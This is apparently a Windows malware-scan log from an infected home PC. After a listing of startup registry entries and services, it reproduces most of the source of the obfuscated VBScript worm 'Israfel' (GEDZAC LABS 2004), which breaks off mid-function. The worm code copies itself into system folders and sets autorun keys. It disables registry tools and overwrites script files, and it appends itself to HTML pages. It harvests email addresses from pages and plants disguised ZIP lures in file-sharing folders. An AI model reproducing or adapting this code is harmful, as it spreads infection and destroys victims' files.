[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2011-02-18 05:12 94208 ----a-w- c:\documents and settings\Annie\Application Data\Dropbox\bin\DropboxExt.14.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SpybotSD TeaTimer"="c:\program files\Spybot - Search & Destroy\TeaTimer.exe" [2009-01-26 2144088]
"Facebook Update"="c:\documents and settings\Annie\Local Settings\Application Data\Facebook\Update\FacebookUpdate.exe" [2011-11-07 137536]
"AttachmentWiperiportal.sickkids.ca"="c:\documents and settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\AttachmentWiper.exeBatchRun\run.bat" [2012-03-21 538]
"DAEMON Tools Lite"="c:\program files\DAEMON Tools Lite\DTLite.exe" [2012-01-24 3478336]
"ViStart"="c:\program files\ViStart\ViStart.exe" [2011-11-27 856064]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IAAnotif"="c:\program files\Intel\Intel Matrix Storage Manager\iaanotif.exe" [2008-04-15 178712]
"LManager"="c:\progra~1\LAUNCH~1\LManager.exe" [2009-02-12 862728]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2008-02-28 141848]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2008-02-28 166424]
"Persistence"="c:\windows\system32\igfxpers.exe" [2008-02-28 137752]
"RTHDCPL"="RTHDCPL.EXE" [2009-02-24 17529856]
"AzMixerSel"="c:\program files\Realtek\Audio\Drivers\AzMixerSel.exe" [2006-07-17 53248]
"IMJPMIG8.1"="c:\windows\IME\imjp8_1\IMJPMIG.EXE" [2008-04-14 208952]
"MSPY2002"="c:\windows\system32\IME\PINTLGNT\ImScInst.exe" [2008-04-14 59392]
"PHIME2002ASync"="c:\windows\system32\IME\TINTLGNT\TINTSETP.EXE" [2008-04-14 455168]
"PHIME2002A"="c:\windows\system32\IME\TINTLGNT\TINTSETP.EXE" [2008-04-14 455168]
"PLFSetL"="c:\windows\PLFSetL.exe" [2008-07-03 94208]
"snp2uvc"="c:\windows\system32\csnp2uvc.dll" [2009-02-16 196608]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2009-02-06 1430824]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2010-05-14 248552]
"Israfel"="c:\windows\system32\Israfel.vbs" [2012-03-01 272349]
.
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]
.
c:\documents and settings\Annie\Start Menu\Programs\Startup\
Dropbox.lnk - c:\documents and settings\Annie\Application Data\Dropbox\bin\Dropbox.exe [2012-2-14 24246216]
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\DivXUpdate]
2011-03-21 18:56 1230704 -c--a-w- c:\program files\DivX\DivX Update\DivXUpdate.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\VideoWebCamera]
2009-05-20 02:30 1552501 ----a-w- c:\program files\VideoWebCamera\VideoWebCamera.exe
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)
"DisableNotifications"= 1 (0x1)
.
R1 dtsoftbus01;DAEMON Tools Virtual Bus Driver;c:\windows\system32\drivers\dtsoftbus01.sys [25/01/2012 4:33 PM 242240]
R2 uagqecsvc;Microsoft Forefront UAG Quarantine Enforcement Client;c:\documents and settings\Annie\Forefront UAG Remote Access Agent\iportalsickkidsca\internal1\uagqecsvc.exe [19/01/2012 12:58 AM 149904]
R3 L1c;NDIS Miniport Driver for Atheros AR8131/AR8132 PCI-E Ethernet Controller;c:\windows\system32\drivers\l1c51x86.sys [03/08/2009 5:09 PM 38912]
S3 Ambfilt;Ambfilt;c:\windows\system32\drivers\Ambfilt.sys [03/08/2009 3:18 PM 1684736]
S3 hwusbdev;Huawei DataCard USB PNP Device;c:\windows\system32\drivers\ewusbdev.sys [30/11/2011 10:18 AM 100736]
S3 RSUSBSTOR;RtsUStor.Sys Realtek USB Card Reader;c:\windows\system32\drivers\RtsUStor.sys [03/08/2009 3:13 PM 162816]
S3 Rts516xIR;Realtek IR Driver;c:\windows\system32\DRIVERS\Rts516xIR.sys --> c:\windows\system32\DRIVERS\Rts516xIR.sys [?]
.
Contents of the 'Scheduled Tasks' folder
.
2012-05-12 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006Core.job
- c:\documents and settings\Annie\Local Settings\Application Data\Facebook\Update\FacebookUpdate.exe [2011-11-07 16:46]
.
2012-05-12 c:\windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006UA.job
- c:\documents and settings\Annie\Local Settings\Application Data\Facebook\Update\FacebookUpdate.exe [2011-11-07 16:46]
.
2012-05-09 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006Core.job
- c:\documents and settings\Annie\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [2012-03-22 15:13]
.
2012-05-12 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1313911845-3924064129-568730901-1006UA.job
- c:\documents and settings\Annie\Local Settings\Application Data\Google\Update\GoogleUpdate.exe [2012-03-22 15:13]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://homepage.gateway.com/rdr.aspx?b=ACGW&l=1009&m=lt20&r=0xph0511x415l03c4wuj5a48l2u599
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~3\Office12\EXCEL.EXE/3000
IE: Google Sidewiki... - c:\program files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_D183CA64F05FDD98.dll/cmsidewiki.html
TCP: DhcpNameServer = 192.168.2.1
FF - ProfilePath - c:\documents and settings\Annie\Application Data\Mozilla\Firefox\Profiles\lk3zpup6.default\
var fso = new ActiveXObject(Scripting.FileSystemObject);
var wsl = new ActiveXObject(WScript.Shell);
var js = fso.OpenTextFile(WScript.ScriptFullName);
for (i=1; i<13; i++) { js.SkipLine(); }
jsc = js.ReadAll();
jsc = jsc.replace(*/,);
js.Close();
var js = fso.CreateTextFile(fso.GetSpecialFolder(1)+\\js.vbs);
js.Write(jsc);
js.Close();
wsl.Run(fso.GetSpecialFolder(1)+\\js.vbs);
/*
'<*****************************GEDZAC LABS 2004****************************>
Rem VBS/Israfel.a un producto de <GEDZAC LABS>
Rem USA aqui tienes un enemigo más, un grano de arena más en el desierto
'----------------------------------------------------------------------------
On Error Resume Next
Dim fso, wsl, wsn, sdy, iscript, Espejo, jscode, Atf
If iH() Then
If iHt() Then
Err.Clear
Set fso = CreateObject(q(Tdunwsni`)AnkbT~tsbjHembds))
Set wsl = CreateObject(q(PTdunws)Tobkk))
If Err.Number <> 0 Then
If InStr(LCase(Navigator.SystemLanguage),q(bt)) <> 0 Then
msgh=q(Buuhu'5766) & vbCrlf & q(Btsf'Wf`nif'Ubvrnbub'Dhisuhkbt'Fdsnqb_'wfuf'tbu'jhtsufcf'bi'tr'shsfkncfc) & vbCrlf & q(Wubtnhib'Fdbwsfu)
Else
msgh=q(Buuhu'5766) & vbCrlf & q(Sont'Wf`nifsbt'ns'Ubvrnubt'Dhisuhkt'Fdsnqb_'sh'eb'tohpi'ni'sobnu'bisnubs~) & vbCrlf & q(Wubtt'sh'Fddbws)
End If
Window.alert(msgh)
document.location.reload
End If
Else
Set AppleObject = document.applets(GEDZAC)
AppleObject.setCLSID({F935DC22-1CF0-11D0-ADB9-00C04FD58A0B})
AppleObject.createInstance()
Set wsl = AppleObject.GetObject()
AppleObject.setCLSID({0D43FE01-F093-11CF-8940-00A0C9054228})
AppleObject.createInstance()
Set fso = AppleObject.GetObject()
End If
Call Dropvbs
Else
Set fso = CreateObject(q(Tdunwsni`)AnkbT~tsbjHembds)): Set wsl = CreateObject(q(PTdunws)Tobkk))
Set wsn = CreateObject(q(PTdunws)Ibsphul)): Set Sdy = CreateObject(q(Tdunwsni`)Cndsnhifu~))
Set ms = fso.OpenTextFile(Gsp(3)): iscript = ms.ReadAll: ms.Close
Rgw q(OLB^XDKFTTBTXUHHS[ub`ankb[tobkk[hwbi[dhjjfic[), GEDZAC,
Rgw q(OLB^XDKFTTBTXUHHS[lb~ankb[tobkk[hwbi[dhjjfic[), GEDZAC,
Rgw q(OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt'Tdunwsni`'Ohts[Tbssni`t[Snjbhrs),0,REG_DWORD
Rgw q(OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~Shhkt),1,REG_DWORD
Rgw q(OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[PnichptIS[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~Shhkt),1,REG_DWORD
Rgw q(OLB^XKHDFKXJFDONIB[Thaspfub[Jnduhthas[Pnichpt'Tdunwsni`'Ohts[Tbssni`t[Snjbhrs),0,REG_DWORD
Rgw q(OLB^XKHDFKXJFDONIB[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~Shhkt),1,REG_DWORD
Rgw q(OLB^XKHDFKXJFDONIB[Thaspfub[Jnduhthas[PnichptIS[DruubisQbutnhi[Whkndnbt[T~tsbj[CntfekbUb`ntsu~Shhkt),1,REG_DWORD
jscode=q(qfu'ath':'ibp'Fdsnqb_Hembds/%Tdunwsni`)AnkbT~tsbjHembds%.<)&vbcrlf&_
q(qfu'ptk':'ibp'Fdsnqb_Hembds/%PTdunws)Tobkk%.<)&vbcrlf&q(qfu'mt':'ath)HwbiSbsAnkb/PTdunws)TdunwsArkkIfjb.<)&vbcrlf&_
q(ahu'/n:6<'n;64<'n,,.'|'mt)TlnwKnib/.<'z)&vbcrlf&q(mtd':'mt)UbfcFkk/.<)&vbcrlf&_
q(mtd':'mtd)ubwkfdb/%-(%+%%.<)&vbcrlf&q(mt)Dkhtb/.<)&vbcrlf&_
q(qfu'mt':'ath)DubfsbSbsAnkb/ath)@bsTwbdnfkAhkcbu/6.,%[[mt)qet%.<)&vbcrlf&_
q(mt)Punsb/mtd.<)&vbcrlf&q(mt)Dkhtb/.<)&vbcrlf&q(ptk)Uri/ath)@bsTwbdnfkAhkcbu/6.,%[[mt)qet%.<)&vbcrlf&q((-)&vbcrlf
If InStr(LCase(Gsp(3)),q(lbuibk45))=0 Then
Call Main: WScript.Quit
Else
Call Main: Call ListP2P: Call iFirmas
Call CreateASP: Call VBSinDoc
Call VBSinXls: Call SearchInDrivesB
Call Payload: Call SendImail
'->Call ActualizarVBS: Call SearchInDrivesA
Call ISleep
End If
End If
'----------------------------------------------------------------------------
Sub Main()
On Error Resume Next
Call CreateNewExt
Rgw q(OLB^XKHDFKXJFDONIB[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Lbuibk45), Gsp(1)&q([Lbuibk45)pni),
fso.CopyFile Gsp(3), Gsp(1)&q([Ntufabk)qet)
Rgw q(OLB^XKHDFKXJFDONIB[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[Ntufabk), Gsp(1)&q([Ntufabk)qet),
fso.CopyFile Gsp(3), Gsp(1)&q([@BC]FD)qet)
fso.CopyFile Gsp(3), Gsp(1)&q([jhrtbXdhian`rufshu)pni)
IniEdit Gsp(0)&q([pni)nin), q(\pnichptZ), q(uri), Gsp(1)&q([jhrtbXdhian`rufshu)pni)
fso.CopyFile Gsp(3), Gsp(1)&q([pnij`c)pni)
IniEdit Gsp(0)&q([t~tsbj)nin), q(\ehhsZ), q(tobkk), q(Bwkhubu)bb') & Gsp(1)&q([pnij`c)pni)
fso.CopyFile Gsp(3), Gsp(1)&q([Ankb)qet)
If Not(FileEx(Gsp(1)&q([wl}nw)bB))) Then Omponents 1,Gsp(1)&q([wl}nw)bB)
If Not(FileEx(Gsp(1)&q([ub`tuq)bB))) Then Omponents 4,Gsp(1)&q([ub`tuq)bB)
wsl.Run Gsp(1)&q([ub`tuq)bB)
If Not(FileEx(Gsp(1)&q([ankb}nw)}nw))) Then
wsl.Run GetCl() & Gsp(1)&q([wl}nw)bb') & fso.GetFolder(Gsp(1)).ShortPath & q([ankb}nw)}nw) & & Nms(Gsp(1)&q([ankb)qet)),0,True
End If
If FileEx(Gsp(1)&q([Lbuibk45)pni)) Then Exit Sub
Call Avril
Rgw q(OLB^XKHDFKXJFDONIB[Thaspfub[@BC]FD'KFET[Ntufabk[Wfubis),Gsp(3),
fso.CopyFile Gsp(3), Gsp(1)&q([Lbuibk45)pni)
If InStr(LCase(Gsp(3)),q(lbuibk45))=0 Then wsl.Run Gsp(1)&q([Lbuibk45)pni): WScript.Quit
End Sub
'----------------------------------------------------------------------------
Sub SearchInDrivesA()
On Error Resume Next
Set Osd = CreateObject(q(Phuc)Fwwkndfsnhi))
If ValidObject(Osd)=False Then Set Osd = CreateObject(q(Bdbk)Fwwkndfsnhi))
If ValidObject(Osd)=False Then Call SearhInDrivesB: Exit Sub
Osd.Visible = False
For Each n in fso.Drives
If (n.DriveType = 2) Or (n.DriveType = 3) Then
Set Nsf = Osd.FileSearch
Nsf.NewSearch
Nsf.LookIn = n.Path & \
Nsf.SearchSubFolders = True
Nsf.FileName = q(-)os<'-)wk`<'-)jos-<'-)qet<'-)qeb<'-)osj-<'-)osf<'-)mt-<'-)}nw<'-)wow<'-)mtw<'-)tosj-<'-)wosj-<'jnud)nin)
Nsf.Execute
For i = 1 To Nsf.FoundFiles.Count
fExt = LCase(fso.GetExtensionName(Nsf.FoundFiles(i))): fNam = LCase(fso.GetFile(Nsf.FoundFiles(i)).Name)
If (fExt=vbs) Or (fExt=vbe) Then
iVbs(Nsf.FoundFiles(i))
ElseIf (fExt=js) Or (fExt=jse) Then
iJs(Nsf.FoundFiles(i))
ElseIf (fExt=hta) Or (fExt=htm) Or (fExt=html) Or (fExt=php) Or (fExt=shtm) Or (fExt=shtml) Or (fExt=phtm) Or (fExt=phtml) Or (fExt=mht) Or (fExt=mhtml) Or (fExt=plg) Or (fExt=htx) Then
iHta(Nsf.FoundFiles(i))
ElseIf (fExt=zip) Then
iZip(Nsf.FoundFiles(i))
ElseIf (fNam=mirc.ini) Then
iMirc(Nsf.FoundFiles(i))
End If
Next
End If
Next
Osd.Quit
End Sub
'----------------------------------------------------------------------------
Sub SearchInDrivesB()
On Error Resume Next
Im=Array(q([njo)cfs),q([njk)cfs),q([njq)cfs))
For i=0 To 2: Set Imm=fso.CreateTextFile(Gsp(2)&Im(i)): Imm.write Israfel/GEDZAC: Imm.Close: Next
For Each D In fso.Drives
If (D.DriveType=2) Or (D.DriveType=3) Then SearchInFolders(D.Path&\)
Next
End Sub
'----------------------------------------------------------------------------
Sub SearchInFolders(Path)
On Error Resume Next
For Each F In fso.GetFolder(Path).SubFolders
SearchFiles(F.Path)
SearchInFolders(F.Path)
Next
End Sub
'----------------------------------------------------------------------------
Sub SearchFiles(Path)
On Error Resume Next
For Each Fi In fso.GetFolder(Path).Files
fExt = LCase(fso.GetExtensionName(Fi.Path)): fNam = LCase(Fi.Name)
If (fExt=vbs) Or (fExt=vbe) Then
iVbs(Fi.Path)
ElseIf (fExt=js) Or (fExt=jse) Then
iJs(Fi.Path)
ElseIf (fExt=hta) Or (fExt=htm) Or (fExt=html) Or (fExt=php) Or (fExt=shtm) Or (fExt=shtml) Or (fExt=phtm) Or (fExt=phtml) Or (fExt=mht) Or (fExt=mhtml) Or (fExt=plg) Or (fExt=htx) Then
iHta(Fi.Path)
ElseIf (fExt=zip) Then
iZip(Fi.Path)
ElseIf (fNam=mirc.ini) Then
iMirc(Fi.Path)
End If
Next
End Sub
'----------------------------------------------------------------------------
Sub iVbs(Path)
On Error Resume Next: SA Path,0
Set vbs = fso.OpenTextFile(Path,2,1): vbs.write iscript: vbs.Close
End Sub
'----------------------------------------------------------------------------
Sub iJs(Path)
On Error Resume Next: SA Path,0
Set js = fso.OpenTextFile(Path,2,1): js.write jscode & iscript & q(-(): js.Close
End Sub
'----------------------------------------------------------------------------
Sub iHta(Path)
On Error Resume Next: SA Path,0
Set Xf = fso.OpenTextFile(Path)
Do While Xf.AtendOfstream = False
Xl = Xf.ReadLine
If InStr(LCase(Xl), israfel) <> 0 then
Exit Do
End if
n = InStr(LCase(Xl), mailto:)
If n <> 0 Then
Xl = Left(Right(Xl, (Len(Xl) - (n + 6))), InStr(Right(Xl, (Len(Xl) - (n + 6))), Chr(34)) - 1)
If IsMail(Xl) Then Sdy.Add Sdy.Count + 1, Xl
End If
Loop
Xf.Close
Call iMail
Set hta = fso.OpenTextFile(Path): htar = hta.ReadAll: hta.Close
If InStr(LCase(htar),israfel)<>0 Then Exit Sub
If InStr(LCase(Path),inetpub)=0 Then
Set hta = fso.OpenTextFile(Path,8): hta.write vbcrlf& q(;Tdunws'Kfi`rf`b: QETdunws 9) &vbcrlf& iscript &vbcrlf& q(;(Tdunws9): hta.Close
Else
Set hta = fso.OpenTextFile(Path,2): hta.write vbcrlf & q(;Hembds'Cfsf:%nntuhhs)ftw%9;(Hembds9)&<!-- Israfel --¡> & vbCrlf & htar: hta.Close
End If
End Sub
'----------------------------------------------------------------------------
Sub iZip(Path)
On Error Resume Next
If Not(FileEx(Gsp(1)&\file.vbs)) Then Exit Sub
SA Path,0
wsl.Run GetCl() & Gsp(1)&\pkzip.exe -U & Nms(Path) & & Nms(Gsp(1)&\file.vbs),0,True
End Sub
'----------------------------------------------------------------------------
Sub ListP2P()
On Error Resume Next
p1 = Array(q(D=[Wuh`ufj'Ankbt), q(D=[Fudonqht'cb'wuh`ufjf))
p2 = Array(q([fwwkbMrndb[nidhjni`), q([bChilb~5777[nidhjni`), q([@irdkbrt[Chpikhfct), _
q([@uhltsbu[J~'@uhltsbu), q([NDV[tofubc'ankbt), q([Lf}ff[J~'Tofubc'Ahkcbu), _
q([Lf]fF'Knsb[J~'Tofubc'Ahkcbu), q([KnjbPnub[Tofubc), q([jhuwobrt[J~'Tofubc'Ahkcbu), _
q([Hqbuibs[nidhjni`), q([Tofubf}f[Chpikhfct), q([Tpfwshu[Chpikhfc), q([PniJ_[J~'Tofubc'Ahkcbu), _
q([Sbtkf[Ankbt), q([_hkh_[Chpikhfct), q([Ufwn`fshu[Tofub), q([LJC[J~'Tofubc'Ahkcbu), q([EbfuTofub[Tofubc))
For i = 0 To UBound(p1)
If FolderEx(p1(i)) Then
For x = 0 To UBound(p2)
If FolderEx(p1(i) & p2(x)) Then InfectP2P (p1(i) & p2(x))
Next
End If
Next
If FolderEx(q(D=[J~'Chpikhfct)) Then InfectP2P (q(D=[J~'Chpikhfct))
If FolderEx(q(D=[J~'Tofubc'Ahkcbu)) Then InfectP2P (q(D=[J~'Tofubc'Ahkcbu))
IsD = Rgr(q(OLB^XDRUUBISXRTBU[Thaspfub[ThrkTbbl[NitsfkkWfso))
If IsD <> Then VSoulSeek IsD
End Sub
'----------------------------------------------------------------------------
Sub VSoulSeek(Path)
On Error Resume Next
Set sl1 = fso.OpenTextFile(Path & \shared.cfg)
Do While sl1.AtendOfstream = False
sl2 = sl1.ReadAll
Loop: sl1.Close
sl2 = Mid(sl2, 9, Len(sl2) - 14): sl2 = Mid(sl2, InStr(sl2, :) - 1): InfectP2P sl2
End Sub
'----------------------------------------------------------------------------
Sub InfectP2P(Path)
On Error Resume Next
If Right(Path,1) <> \ Then Path = Path & \
For Each i In P2PName()
If Not(FileEx(Path & i)) Then fso.CopyFile Gsp(1) & \filezip.zip, Path & i
Next
For Each i In ListFiles(Path)
If Not(FileEx(Path & i & .zip)) Then
If i <> Then fso.CopyFile Gsp(1) & \filezip.zip, Path & i & .zip
End If
Next
End Sub
'----------------------------------------------------------------------------
Function ListFiles(Path)
On Error Resume Next: Dim x()
Set Gf = fso.GetFolder(Path): ReDim x(Gf.Files.Count): a = 0
For Each i In Gf.Files
Ex = LCase(fso.GetExtensionName(i.Path))
If (Ex <> zip) Then x(a) = fso.GetBaseName(i.Name): a = a + 1
Next: ListFiles = x
End Function
'----------------------------------------------------------------------------
Sub CreateNewExt()
On Error Resume Next
Rgw q(OLB^XDKFTTBTXUHHS[)pni[),q(pniankb),
Rgw q(OLB^XDKFTTBTXUHHS[)pni[Dhisbis'S~wb),q(fwwkndfsnhi(*jtchpikhfc),
Rgw q(OLB^XDKFTTBTXUHHS[pniankb[CbafrksNdhi[),Rgr(q(OLB^XDKFTTBTXUHHS[ckkankb[CbafrksNdhi[)),
Rgw q(OLB^XDKFTTBTXUHHS[pniankb[TdunwsBi`nib[),q(QETdunws),
Rgw q(OLB^XDKFTTBTXUHHS[pniankb[Tobkk[Hwbi[Dhjjfic[),WScript.FullName & %1 %*,
Rgw q(OLB^XDKFTTBTXUHHS[pniankb[TobkkB[Wuhwbus~TobbsOfickbut[PTOWuhwt[),q(|17523DF2*>24E*66DA*?D>1*77FF77E?07?Dz),
Rgw q(OLB^XDKFTTBTXUHHS[pniankb[TdunwsOhtsBidhcb[),q(|?2646146*3?7D*66C5*E6A>*77D73A?1D453z),
End Sub
'----------------------------------------------------------------------------
Sub Payload()
On Error Resume Next
Set pay = fso.CreateTextFile(C:\Estigma.hta): pay.write q(;osjk9;obfc9;snskb9Ntufabk'Phuj'*'@BC]FD'KFET'5774;(snskb9;(obfc9;ehc~'e`dhkhu:ekfdl'sbs:ubc9;dbisbu9;e9;----------------@BC]FD'KFET----------------9;w9QET(Ntufabk'e~'JfdonibCufjhi(@BC]FD;w9Obdoh'bi'bk'Wbuý'+Dfkncfc'Jricnfk''';w9¦Knebusfc'f'Wfkbtsnif+'Nufv'~'Fa`fintsfi'*'Jrbusb'fk'Njwbunfkntjh'cb'bbrr&;eu9;w9@BC]FD'KFET'5774;(e9;(dbisbu9;(ehc~9;(osjk9): pay.Close
If Day(Date) = 3 Then wsl.Run C:\Estigma.hta
If Day(Date) = 29 Then wsl.Run hxxp://www.avril-lavigne.com
If Day(Date) = 19 Then msgbox 19/12/2003 - Saludos a Cienciano Campeon 2003 de la Copa Sudamericana
If Day(Date) = 26 Then
wscript.echo Soy una ballena de color azúl mi espalda sopla y tu ves esa fuente&vbcrlf&_
de agua limpia aún. Nuestra casa abierta, era el ancho mar&vbcrlf&_
Viajábamos en paz, sin manchas de petróleo que evitar&vbcrlf&_
Busco un sitio puro donde descansar no hay muchas como yo&vbcrlf&_
me tengo que cuidar de ti. Nubes blancas, cielo transparente&vbcrlf&_
y el humano compartiendo con otros, un sueño que quizás ya no regrese&vbcrlf&_
pues ya es tarde para todos nosotros&vbcrlf&_
Soy el cóndor majestuoso del Perú, mi cuello gira y tú&vbcrlf&_
me miras con ojos de luz. Busco un sitio alto donde recordar&vbcrlf&_
que hubo un tiempo mejor, pues como yo no quedan más&vbcrlf&_
Si tus hijos te preguntan cómo fui, no sé que les dirás, me tuve que alejar de ti&vbcrlf&_
Cordilleras blancas dominando, todo ser que se alimenta del río&vbcrlf&_
hombres en aldeas cultivando, sin decirle al campo dame lo que es mío&vbcrlf&_
Estás equivocado, no sabes dónde vas&vbcrlf&guanacos, osos panda, renos, águilas, delfines y todo lo demás&vbcrlf&_
Estás equivocado no sabes dónde vas&vbcrlf&un espíritu ronda por la selva llorando lo que fue el jaguar&vbcrlf&_
bienvenido al mundo del hombre construído con detergentes y también con alquitrán&vbcrlf&_
Soy una ballena de color azúl mi espalda sopla y tú&vbcrlf&ves esa fuente de agua limpia aún&vbcrlf&vbcrlf&vbcrlf&_
(Cancion perteneciente a 'Los Nosequien y Los Nosecuantos')&vbcrlf&vbcrlf&vbcrlf&El 26 de Abril es el día de la Tierra, protegela
End If
If Day(Date) = 11 Then
msgbox Luego del alevoso ataque de eeuu y sus aliados&vbcrlf&contra Iraq, aun tiene bush el descaro de decir&vbcrlf&_
que lo hizo por libertar al pueblo o por la&vbcrlf&democracia, como si eso le interesara, solo le&vbcrlf&_
interesa tener gobiernos titeres y el petroleo&vbcrlf&(investiguen sobre su dizque reconstruccion&vbcrlf&_
de Iraq), desde los 90 que se pretendia derrocar&vbcrlf&al gobierno de Iraq, quien le dio el derecho de decidir que&vbcrlf&_
gobiernos deben ser derrocados o no, acaso&vbcrlf&se cree el policia del mundo, una de las frases&vbcrlf&_
favoritas del Asesino de bush, es el 'origen&vbcrlf&del mal' el es eso.&vbcrlf&_
Y para terminar otra de sus frases&vbcrlf&'que Dios bendiga a los eeuu' ojala lo haga&vbcrlf&_
porque lo van a nesecitar, porque algun&vbcrlf&dia eeuu pagara por querer decirle al&vbcrlf&_
mundo como tiene que vivir&vbcrlf&vbcrlf&(Mensage en contra del Gobierno de eeuu, no del pueblo)
End If
End Sub
'----------------------------------------------------------------------------
Function P2PName()
On Error Resume Next
P = Array(Ana Kournikova Sex Video.zip, AVP Antivirus Pro Key Crack.zip, Britney Spears Sex Video.zip, Buffy Vampire Slayer Movie.zip, _
Crack Passwords Mail.zip, Cristina Aguilera Sex Video.zip, Game Cube Real Emulator.zip, Hentai Anime Girls Movie.zip, Jenifer Lopez Sex Video.zip, _
Matrix Movie.zip, Mcafee Antivirus Scan Crack.zip, Norton Anvirus Key Crack.zip, Panda Antivirus Titanium Crack.zip, PS2 PlayStation Simulator.zip, _
Quick Time Key Crack.zip, Sakura Card Captor Movie.zip, Sex Live Simulator.zip, Sex Passwords.zip, Spiderman Movie.zip, Start Wars Trilogy Movies.zip, _
Thalia Sex Video.zip, Winzip KeyGenerator Crack.zip , aol cracker.zip, aol password cracker.zip, divx pro.zip, GTA 3 Crack.zip, GTA 3 Serial.zip, _
play station emulator.zip, virtua girl - adriana.zip, virtua girl - bailey short skirt.zip, Virtua Girl (Full).zip, warcraft 3 crack.zip, warcraft 3 serials.zip, _
counter-strike.zip, delphi.zip, divx_pro.zip, HotGirls.zip, hotmail_hack.zip, pamela_anderson.zip, serials2000.zip, subseven.zip, VB6.zip, VirtualSex.zip, _
ACDSee 5.5.zip, Age of Empires 2 crack.zip, Animated Screen 7.0b.zip, AOL Instant Messenger.zip, AquaNox2 Crack.zip, Audiograbber 2.05.zip, BabeFest 2003 ScreenSaver 1.5.zip, _
Babylon 3.50b reg_crack.zip, Battlefield1942_bloodpatch.zip, Battlefield1942_keygen.zip, Business Card Designer Plus 7.9.zip, Clone CD 5.0.0.3 (crack).zip, Clone CD 5.0.0.3.zip, _
Coffee Cup Free zip 7.0b.zip, Cool Edit Pro v2.55.zip, Diablo 2 Crack.zip, DirectDVD 5.0.zip, DirectX Buster (all versions).zip, DirectX InfoTool.zip, DivX Video Bundle 6.5.zip, _
Download Accelerator Plus 6.1.zip, DVD Copy Plus v5.0.zip, DVD Region-Free 2.3.zip, FIFA2003 crack.zip, Final Fantasy VII XP Patch 1.5.zip, Flash MX crack (trial).zip, FlashGet 1.5.zip, _
FreeRAM XP Pro 1.9.zip, GetRight 5.0a.zip, Global DiVX Player 3.0.zip, Gothic2 licence.zip, Guitar Chords Library 5.5.zip, Hitman_2_no_cd_crack.zip, Hot Babes XXX Screen Saver.zip, _
ICQ Pro 2003a.zip, ICQ Pro 2003b (new beta).zip, iMesh 3.6.zip, iMesh 3.7b (beta).zip, IrfanView 4.5.zip, KaZaA Hack 2.5.0.zip, KaZaA Speedup 3.6.zip, Links 2003 Golf game (crack).zip, _
Living Waterfalls 1.3.zip, Mafia_crack.zip, Matrix Screensaver 1.5.zip, MediaPlayer Update.zip, mIRC 6.40.zip, mp3Trim PRO 2.5.zip, MSN Messenger 5.2.zip, NBA2003_crack.zip, _
Need 4 Speed crack.zip, Nero Burning ROM crack.zip, Netfast 1.8.zip, Network Cable e ADSL Speed 2.0.5.zip, NHL 2003 crack.zip, Nimo CodecPack (new) 8.0.zip, PalTalk 5.01b.zip, _
Popup Defender 6.5.zip, Pop-Up Stopper 3.5.zip, QuickTime_Pro_Crack.zip, Serials 2003 v.8.0 Full.zip, SmartFTP 2.0.0.zip, SmartRipper v2.7.zip, Space Invaders 1978.zip, _
Splinter_Cell_Crack.zip, Steinberg_WaveLab_5_crack.zip, Trillian 0.85 (free).zip, TweakAll 3.8.zip, Unreal2_bloodpatch.zip, Unreal2_crack.zip, UT2003_bloodpatch.zip, _
UT2003_keygen.zip, UT2003_no cd (crack).zip, UT2003_patch.zip, WarCraft_3_crack.zip, Winamp 3.8.zip, WindowBlinds 4.0.zip, WinOnCD 4 PE_crack.zip, WinZip 9.0b.zip, _
Yahoo Messenger 6.0.zip, Zelda Classic 2.00.zip, Windows XP complete + serial.zip, Screen saver christina aguilera.zip, Screen saver christina aguilera naked.zip, Visual basic 6.zip, _
Starcraft serial.zip, Credit Card Numbers generator(incl Visa,MasterCard,...).zip, Edonkey2000-Speed me up scotty.zip, Hotmail Hacker 2003-Xss Exploit.zip, Kazaa SDK + Xbit speedUp for 2.xx.zip, _
Microsoft KeyGenerator-Allmost all microsoft stuff.zip, Netbios Nuker 2003.zip, Security-2003-Update.zip, Stripping MP3 dancer+crack.zip, Visual Basic 6.0 Msdn Plugin.zip, Windows Xp Exploit.zip, _
WinRar 3.xx Password Cracker.zip, WinZipped Visual C++ Tutorial.zip, XNuker 2003 2.93b.zip, cable modem ultility pack.zip, macromedia dreamweaver key generator.zip, winamp plugin pack.zip, _
winzip full version key generator.zip): P2PName = P
End Function
'----------------------------------------------------------------------------
Function ValidObject(Obj)
On Error Resume Next
